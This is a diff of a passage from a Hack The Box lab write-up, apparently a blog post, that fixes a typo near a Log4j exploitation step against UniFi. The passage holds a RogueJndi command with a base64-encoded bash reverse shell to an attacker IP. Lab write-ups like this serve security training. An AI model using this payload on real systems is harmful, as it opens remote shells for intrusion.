woadey/woadey.github.io/content/posts/htb/tier2/index.md

 `LDAP` (Lightweight Directory Access Protocol) is an open, vendor-neutral, industry standard application protocol for accessing and maintaining distributed directory information services over the Internet or a Network.
 The default port that LDAP runs on is port 389."

-***Important note:*** you must remove the spaces from the command listed in the [above writeup](https://www.sprocketsecurity.com/resources/another-log4j-on-the-fire-unifi) in order to succesfully get a reverse shell:
+***Important note:*** you must remove the spaces from the command listed in the [above writeup](https://www.sprocketsecurity.com/resources/another-log4j-on-the-fire-unifi) in order to successfully get a reverse shell:

 ```sh
 java -jar target/RogueJndi-1.1.jar --command "bash -c {echo,YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTQuMjUvNDQ0NCAwPiYxCg==}|{base64,-d}|{bash,-i}" --hostname "10.10.14.25"